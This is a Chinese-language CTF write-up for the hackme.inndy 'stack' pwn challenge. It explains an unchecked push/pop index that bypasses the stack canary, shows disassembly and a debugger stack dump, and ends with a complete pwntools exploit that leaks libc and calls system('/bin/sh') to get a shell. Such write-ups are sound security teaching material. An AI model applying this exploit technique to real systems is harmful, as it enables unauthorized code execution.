stack writeup - zs0zrc

本文最后更新于：星期三, 一月 2日 2019, 3:48 下午

防护机制：全开

同时题目提供了一部分代码，通过阅读代码可以发现程序在模拟栈的PUSH和POP操作

void stack_push(struct stack *s, int val) {
    s->data[s->n++] = val;
}

int stack_pop(struct stack *s) {
    return s->data[--s->n];
}

stack的结构体

struct stack {
    int n;
       int data[64];
};

通过ida反编译后查看代码

int __cdecl stack_push(int *stack, int num)
{
  int result; // eax

  result = *stack;
  *stack += &(&GLOBAL_OFFSET_TABLE_)[4294967042] + 1;
  stack[result + 1] = num;
  return result;
}

int __cdecl stack_pop(_DWORD *a1)
{
  *a1 += &unk_1FBF + 0xFFFFE040;
  return *(&dword_1FC4[-2032] + &a1[*a1]);
}

不知道为什么我这反编译的东西看的这么奇怪，但是不管这个，程序没有对push或者pop的下标进行检查，所以可以先pop然后在push修改下标，就可以绕过canary，修改返回地址

push函数的汇编代码：

.text:000006F0 stack_push      proc near               ; CODE XREF: main+DC↓p
.text:000006F0
.text:000006F0 stack           = dword ptr  8
.text:000006F0 num             = dword ptr  0Ch
.text:000006F0
.text:000006F0 ; __unwind {
.text:000006F0                 push    ebp
.text:000006F1                 mov     ebp, esp
.text:000006F3 ; 4:   result = *stack;
.text:000006F3                 call    __x86_get_pc_thunk_ax
.text:000006F8                 add     eax, 18C8h
.text:000006FD                 mov     eax, [ebp+stack]//n
.text:00000700                 mov     eax, ds:(_GLOBAL_OFFSET_TABLE_ - 1FC0h)[eax]
.text:00000702 ; 5:   *stack += &(&GLOBAL_OFFSET_TABLE_)[4294967042] + 1;
.text:00000702                 lea     ecx, (_GLOBAL_OFFSET_TABLE_+1 - 1FC0h)[eax]
.text:00000705                 mov     edx, [ebp+stack]
.text:00000708                 mov     [edx], ecx
.text:0000070A ; 6:   stack[result + 1] = num;
.text:0000070A                 mov     edx, [ebp+stack] //stack
.text:0000070D                 mov     ecx, [ebp+num] // number
.text:00000710                 mov     [edx+eax*4+4], ecx

可以看到edx存放着stack结构体的地址，ecx存放着要进行操作的操作数，eax存放着要下标n

pop函数汇编：

=> 0x56555717 <+0>:    push   ebp
   0x56555718 <+1>:    mov    ebp,esp
   0x5655571a <+3>:    call   0x56555917 <__x86.get_pc_thunk.ax>
   0x5655571f <+8>:    add    eax,0x18a1
   0x56555724 <+13>:    mov    eax,DWORD PTR [ebp+0x8]
   0x56555727 <+16>:    mov    eax,DWORD PTR [eax]
   0x56555729 <+18>:    lea    edx,[eax-0x1]
   0x5655572c <+21>:    mov    eax,DWORD PTR [ebp+0x8]
   0x5655572f <+24>:    mov    DWORD PTR [eax],edx
   0x56555731 <+26>:    mov    eax,DWORD PTR [ebp+0x8]
   0x56555734 <+29>:    mov    edx,DWORD PTR [eax] \\ n
   0x56555736 <+31>:    mov    eax,DWORD PTR [ebp+0x8] \\ stack
   0x56555739 <+34>:    mov    eax,DWORD PTR [eax+edx*4+0x4] \\ stack->data[--n]
   0x5655573d <+38>:    pop    ebp
   0x5655573e <+39>:    ret    
End of assembler dump.

观察栈的内容

pwndbg> stack 98
00:0000│ esp  0xffffce4c — 0x56555820 (main+225) — 0x8b10c483
01:0004│      0xffffce50 — 0xffffce68 — 0x0
02:0008│      0xffffce54 — 0x4d2
03:000c│      0xffffce58 — 0xf7ff5ac4 — jae    0xf7ff5b3f
04:0010│      0xffffce5c — 0x5655575a (main+27) — 0x1866c381
05:0014│      0xffffce60 — 0xf7ff39f3 — cmp    al, 0x6d /* '<main program>' */
06:0018│      0xffffce64 — 0x4d2
07:001c│ eax  0xffffce68 — 0x0
... ↓
48:0120│ edi  0xffffcf6c — 0x69 /* 'i' */
49:0124│      0xffffcf70 — 0x0
4a:0128│      0xffffcf74 — 0xffffd245 — 0x6d6f682f ('/hom')
4b:012c│      0xffffcf78 — 0xf7fb6000 (_GLOBAL_OFFSET_TABLE_) — 0x1b1db0
4c:0130│      0xffffcf7c — 0xaf17
4d:0134│      0xffffcf80 — 0xffffd245 — 0x6d6f682f ('/hom')
4e:0138│      0xffffcf84 — 0x2f /* '/' */
4f:013c│      0xffffcf88 — 0x5e /* '^' */
50:0140│      0xffffcf8c — 0x16
51:0144│      0xffffcf90 — 0x8000
52:0148│      0xffffcf94 — 0xf7fb6000 (_GLOBAL_OFFSET_TABLE_) — 0x1b1db0
53:014c│      0xffffcf98 — 0xf7fb4244 — 0xf7e1c020 (_IO_check_libio) — call   0xf7f23b59
54:0150│      0xffffcf9c — 0xf7e1c0ec (init_cacheinfo+92) — test   eax, eax
55:0154│      0xffffcfa0 — 0x1
56:0158│      0xffffcfa4 — 0x56556fc0 (_GLOBAL_OFFSET_TABLE_) — 0x1ee0
57:015c│      0xffffcfa8 — 0x1
58:0160│      0xffffcfac — 0xeb03c600
59:0164│      0xffffcfb0 — 0x1
5a:0168│      0xffffcfb4 — 0xffffd074 — 0xffffd245 — 0x6d6f682f ('/hom')
5b:016c│      0xffffcfb8 — 0xffffd07c — 0xffffd26d — 0x53554244 ('DBUS')
5c:0170│      0xffffcfbc — 0xffffcfe0 — 0x1
5d:0174│      0xffffcfc0 — 0x0
5e:0178│      0xffffcfc4 — 0xf7fb6000 (_GLOBAL_OFFSET_TABLE_) — 0x1b1db0
5f:017c│ ebp  0xffffcfc8 — 0x0
60:0180│      0xffffcfcc — 0xf7e1c637 (__libc_start_main+247) — add    esp, 0x10
61:0184│      0xffffcfd0 — 0xf7fb6000 (_GLOBAL_OFFSET_TABLE_) — 0x1b1db0

返回地址存放着__libc_start_main + 247，可以通过这个泄露出libc地址，然后再覆盖返回地址为system函数地址，将对应参数写入栈中，这里写的地址要转换成int32的类型，不然会发生溢出

转换方法：

func_addr = func_addr- (1<<32)
or
func_addr = func_addr - 0xffffffffff - 1

具体步骤：

1.先pop一次，然后push '93'修改n为0x5d,也就是main函数的返回地址的对应的下标
2.pop leak出libc的地址
3.将system函数写入返回地址中，并且将参数写入对应的位置

exp:

#!/usr/bin/env python
from pwn import *
local = 1

if local:
    p = process('./stack')
    elf = ELF('./stack')
    libc = elf.libc
else:
    host = 'hackme.inndy.tw'
    port = '7716'
    p = remote(host,port)
    elf = ELF('./stack')
    libc = ELF('./libc-2.23.so.i386')

context.arch = elf.arch
context.log_level='debug'

def sd(content):
    p.send(content)

def sl(content):
    p.sendline(content)

def rc():
    return p.recv()

def ru(content):
    return p.recvuntil(content)

def debug(addr,PIE=False):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr)))

def push(number):
    rc()
    sl('i')
    sl(str(number))

def pop():
    rc()
    sl('p')

pop()
push('93')
pop()
ru("Pop -> ")
leak = int(p.recv(10))&0xffffffff
print hex(leak)
libc_base = leak - libc.symbols['__libc_start_main'] - 247
print hex(libc_base)
system = libc.symbols['system'] + libc_base
binsh = libc.search('/bin/sh\x00').next() + libc_base

push(str(system-(1<<32)))
push('0')
push(str(binsh-(1<<32)))
sl('x')
p.interactive()

hackme.inndy_writeup writeup pwn

本博客所有文章除特别声明外，均采用 CC BY-SA 3.0协议。转载请注明出处！